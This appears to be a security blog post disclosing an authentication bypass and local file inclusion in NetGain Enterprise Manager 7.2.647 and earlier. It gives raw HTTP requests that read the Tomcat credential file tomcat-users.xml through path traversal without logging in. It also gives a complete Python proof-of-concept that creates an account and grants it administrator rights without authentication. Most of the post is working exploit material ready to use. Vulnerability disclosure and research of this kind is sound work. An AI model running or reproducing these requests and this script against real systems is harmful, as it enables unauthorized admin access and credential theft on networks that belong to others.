NetGain Enterprise Manager <= 7.2.647 – Authentication Bypass / Local File Inclusion

Local File Inclusion
———————————————-
Normal Request:

POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

filename=iossd.log

We can download another file with change the value on filename parameter and we can send this request without login.

Example:

POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

filename=../../tomcat/conf/tomcat-users.xml

Add User Account with Admin Privilege without Login
———————————————-
We can create user and give admin privilege to user which we have made without login.
Because this app does not check the session on this request

PoC Code:
———————————————-

#!/usr/local/bin/python
# Exploit Title: Add User Account with Admin Privilege without Login
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
 
import requests
import sys
 
try:
 def create():
    ip = str(sys.argv[1])
    port = str(sys.argv[2])
    user = str(sys.argv[3])
    passwd = str(sys.argv[4])
 
    print "\033[1;32m[+]\033[1;m Try to Create user"
    url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
    data= {
        'new': "true", 
        'id': "", 
        'name': user, 
        'dname': "foobar", 
        'password': passwd, 
        'password2': passwd, 
        'description': "", 
        'emails': "foo@bar.com", 
        'mobileNumber': "000000", 
        'loginAttempts': "5",
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        role()
    else:
        print "\033[91m[-]\033[91;m Create User Failed"
 
 
 def role():
    ip = str(sys.argv[1])
        port = str(sys.argv[2])
    user = str(sys.argv[3])
        passwd = str(sys.argv[4])
 
    print "\033[1;32m[+]\033[1;m Get admin role"
    url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
    data= {
        'name': "admin", 
        'description': "Administrator", 
        'users': [user,"admin"],
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
    else:
        print "\033[91m[-]\033[91;m Get admin role Failed"
 
 create();
 
except:
    print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
    print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])

PoC Video:
———————————————-

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About f3ci